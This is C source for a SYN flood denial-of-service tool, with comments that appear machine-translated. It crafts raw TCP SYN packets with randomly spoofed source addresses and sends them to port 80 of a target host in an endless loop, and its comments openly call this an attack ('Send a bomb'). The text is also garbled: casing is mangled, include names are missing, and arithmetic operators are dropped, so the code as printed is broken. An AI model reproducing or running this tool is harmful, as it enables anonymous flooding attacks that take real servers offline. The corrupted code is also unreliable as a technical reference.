/ *************************************** /
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define destport 80 / * Port to attack port (web) * /
#define localport 8888
Void send_tcp (int sockfd, struct sockaddr_in * addr);
UNSIGNED Short Check_sum (unsigned short * addr, int LEN);
INT main (int Argc, char ** argv)
{
Int sockfd;
Struct SockAddr_in Addr;
Struct Hostent * Host;
INT ON = 1;
IF (argc! = 2)
{
FPrintf (stderr, "usage:% s hostnamena", argv [0]);
Exit (1);
}
Bzero (& Addr, Sizeof (Struct SockAddr_in);
Addr.sin_Family = AF_INET;
Addr.sin_Port = HTONS (DESTPORT);
IF (inet_aton (argv [1], & addr.sin_addr) == 0)
{
Host = gethostByname (Argv [1]);
IF (Host == Null)
{
FPrintf (stderr, "hostr," hostr:% sna ", hstrerror (h_errno));
Exit (1);
}
Addr.sin_addr = * (struct in_addr *) (Host-> h_addr_list [0]);
}
/ **** Use ipproto_tcp to create a TCP original socket **** /
SOCKFD = Socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
IF (SockFD <0)
{
FPRINTF (stderr, "socket error:% sna", strrror (errno));
Exit (1);
}
/ ******** Set the IP packet format, tell the system kernel module IP packet by us, *** /
Setsockopt (SockFD, Ipproto_IP, IP_HDRINCL, & ON, SIZEOF (ON));
/ **** There is no way, only the super protecting users can use the original socket ********* /
SetUID (getPid ());
/ ********* Send a bomb !!!! **** /
Send_TCP (Sockfd, & Addr);
}
/ ******* Realization of the bomb ********** /
Void send_tcp (int sockfd, struct sockaddr_in * addr)
{
Char buffer [100]; / **** Used to place our packet **** /
Struct ip * IP;
Struct TCPHDR * TCP;
INT head_len;
/ ******* Our packets do not have any content, so the length is the length of the two structures *** /
Head_len = SizeOf (struct IP) sizeof (struct tcphdr); Bzero (Buffer, 100);
/ ******** Fill the head of the IP packet, remember the header format of the IP? ****** /
IP = (struct ip *) buffer;
IP-> ip_v = ipversion; / ** version is generally 4 ** /
IP-> ip_hl = sizeof (struct IP) >> 2; / ** IP packet head length ** /
IP-> ip_tos = 0; / ** Service Type ** /
IP-> ip_len = htons (head_len); / ** IP packet length ** /
IP-> ip_id = 0; / ** Let the system to fill in ** /
IP-> ip_off = 0; / **, like top, save time ** /
IP-> ip_ttl = maxttl; / ** maximum time 255 ** /
IP-> ip_p = ipproto_tcp; / ** We have to send TCP package ** /
IP-> ip_sum = 0; / ** Check and let the system do ** /
IP-> ip_dst = addr-> sin_addr; / ** We attacked objects ** /
/ ******* Started to fill in the TCP packet ***** /
TCP = (struct tcphdr *) (Buffer SizeOf (Struct IP));
TCP-> Source = HTONS (LocalPort);
TCP-> dest = addr-> sin_port; / ** destination port ** /
TCP-> SEQ = Random ();
TCP-> ACK_SEQ = 0;
TCP-> DOFF = 5;
TCP-> SYN = 1; / ** I want to establish a connection ** /
TCP-> CHECK = 0;
/ ** Ok, everything is ready. Server, you are ready ?? ^ _ ^ ** /
While (1)
{
/ ** You don't know if I am from there, go slowly! ** /
IP-> ip_src.s_addr = random ();
/ ** Everything makes the system, and there is not much meaning, let us check the head. * /
/ ** The following can be available without * /
TCP-> Check = Check_sum (UNSIGNED SHORT *) TCP,
SIZEOF (STRUCT TCPHDR);
Sendto (Sockfd, Buffer, Head_len, 0, Addr, Sizeof (struct sockaddr_in);
}
}
/ * Below is the first verification algorithm, stealing others * /
Unsigned short check_sum (unsigned short * addr, int LEN)
{
Register int NLEFT = LEN;
Register int sum = 0;
Register short * w = addr;
Short answer = 0;
While (NLEFT> 1)
{
SUM = * W ;
NLEFT- = 2;
}
IF (NLEFT == 1)
{
* (UNSIGNED Char *) (& Answer) = * (unsigned char *) W;
SUM = answer;
}
SUM = (SUM >> 16) (SUM & 0xFFF);
SUM = (SUM >> 16);
Answer = ~ SUM;
Return (Answer);
}